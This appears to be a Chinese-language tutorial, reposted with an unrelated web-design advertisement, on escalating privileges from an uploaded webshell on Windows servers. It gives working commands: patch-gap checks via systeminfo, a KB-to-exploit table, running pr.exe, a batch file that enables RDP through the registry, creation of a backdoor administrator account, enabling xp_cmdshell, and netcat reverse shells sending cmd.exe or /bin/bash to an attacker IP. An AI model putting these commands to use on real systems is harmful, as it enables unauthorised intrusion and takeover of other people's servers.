今天就跟大家聊聊有關(guān)基于WebShell的權(quán)限提升，可能很多人都不太了解，為了讓大家更加了解，小編給大家總結(jié)了以下內(nèi)容，希望大家根據(jù)這篇文章可以有所收獲。

為安源等地區(qū)用戶提供了全套網(wǎng)頁設(shè)計制作服務(wù)，及安源網(wǎng)站建設(shè)行業(yè)解決方案。主營業(yè)務(wù)為成都網(wǎng)站建設(shè)、做網(wǎng)站、安源網(wǎng)站設(shè)計，以傳統(tǒng)方式定制建設(shè)網(wǎng)站，并提供域名空間備案等一條龍服務(wù)，秉承以專業(yè)、用心的態(tài)度為用戶提供真誠的服務(wù)。我們深信只要達(dá)到每一位用戶的要求，就會得到認(rèn)可，從而選擇與我們長期合作。這樣，我們也可以走得更遠(yuǎn)！

一、基于WebShell的提權(quán)

1、訪問大馬，查看權(quán)限

http://192.168.1.147/dm.asp

2、若果遇到拒絕訪問什么可以上傳一個aspx的大馬，這個權(quán)限比較大

http://192.168.1.147/da.aspx

二、window提權(quán)

1、查看系統(tǒng)打補(bǔ)丁情況

win2003:

systeminfo>C:Windows\tmp\temp.txt&(for %i in (KB3057191 KB2840221 KB3000061 KB2850851 KB2711167 KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 KB942831 KB2503665 KB2592799 KB956572 KB977165 KB2621440) do @type C:Windows\tmp\temp.txt|@find /i "%i"|| @echo %i Not Installed!)&del /f /q /a C:Windows\tmp\temp.txt

通用型：

systeminfo>C:Windows\tmp\temp.txt&(for %i in (KB3124280 KB3143141 KB3134228 KB3079904 KB3077657 KB3124280 KB3045171 KB2829361 KB3000061 KB2850851 KB2707511 KB970483 KB2124261 KB2271195) do @type C:Windows\tmp\temp.txt|@find /i "%i"|| @echo %i Not Installed!)&del /f /q /a C:WindowsTemptemp.txt

2、補(bǔ)丁對照表，上傳exe，執(zhí)行命令

KB952004 :MS09-012 PR

KB956572 :MS09-012 巴西烤肉

KB2393802:MS11-011

KB2592799:MS11-080

KB2621440:MS12-0203

KB2160329:MS10-048

KB970483 :MS09-020  iis6提權(quán)(可能是)

KB2124261,KB2271195 MS10-065 IIS7提權(quán)(可能是)

KB977165 :MS10-015

KB2360937 MS10-084

KB2478960 MS11-014

KB2507938 MS11-056

KB2566454 MS11-062

KB2646524 MS12-003

KB2645640 MS12-009

KB2641653 MS12-018

KB3077657 MS15_077 字體提權(quán)

KB944653 MS07-067

KB952004 MS09-012

KB971657 MS09-041

KB2620712 MS11-097

kb942831 MS08-005

KB2503665 MS11-046

KB2592799 MS11-080

3、由于存在PR提權(quán)漏洞，所以上傳一個pr.exe執(zhí)行

4、一般那些目錄有讀寫權(quán)限

日志，緩存、回收站、大馬所在目錄

5、開啟3389，命令行

新建一個bat文件，里面輸入以下內(nèi)容，上傳到相應(yīng)目錄

echo Windows Registry Editor Version 5.00>>3389.reg

echo [HKEY_LOCAL_MACHINE\SYSTEM\ CurrentControlSet\Control\Terminal Server]>>3389.reg

echo "fDenyTSConnections"=dword:00000000>>3389.reg

echo [HKEY_LOCAL_MACHINE\SYSTEM\ CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]>>3389.reg

echo "PortNumber"=dword:00000d3d>>3389.reg

echo [HKEY_LOCAL_MACHINE\SYSTEM\ CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]>>3389.reg

echo "PortNumber"=dword:00000d3d>>3389.reg

regedit /s 3389.reg

del 3389.reg

命令行執(zhí)行

/c c:\aiyou\pr.exe "c:\aiyou\3389.bat"

2、用工具開3389端口

3、創(chuàng)建用戶并添加管理員組

net user abc 123 /add

net localgroup administrators abc /add

三、數(shù)據(jù)庫提權(quán)

XP_CMDSHELL開啟方法，新建查詢

四、反彈shell

1、正向連接，主動連接服務(wù)器，服務(wù)器開啟相應(yīng)端口

2、反向連接，服務(wù)器主動連接我們，我們監(jiān)聽某一端口

小攻：nc -lvvp 1234

小受(webshell)：nc.exe -e cmd.exe 192.168.1.133(小攻ip) 1234

3、獲取權(quán)限

4、linux系統(tǒng)nc -e /bin/bash 小攻ip 1234

看完上述內(nèi)容，你們對基于WebShell的權(quán)限提升有進(jìn)一步的了解嗎？如果還想了解更多知識或者相關(guān)內(nèi)容，請關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道，感謝大家的支持。